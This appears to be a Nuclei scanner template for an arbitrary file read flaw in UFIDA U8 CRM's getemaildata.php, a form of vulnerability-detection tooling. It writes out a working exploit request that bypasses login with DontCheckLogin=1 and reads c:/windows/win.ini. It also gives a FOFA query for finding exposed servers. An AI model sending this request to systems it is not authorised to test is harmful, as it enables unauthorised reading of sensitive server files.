id: yonyou-u8-crm-lfi

info:
  name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
  author: xc
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="用友U8CRM"
  tags: yonyou,u8-crm,lfi

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
        condition: and

# digest: 4a0a00473045022100b842b8035efcd409e93e6e1b926e4a4be1446a054c50b421fda0d7d4abcc086302205370fb9b8b44b49f8a13dd899cf0870bd9c18d0101dd39e55f21e5f10e8bd74e:922c64590222798bb761d5b6d8e72950
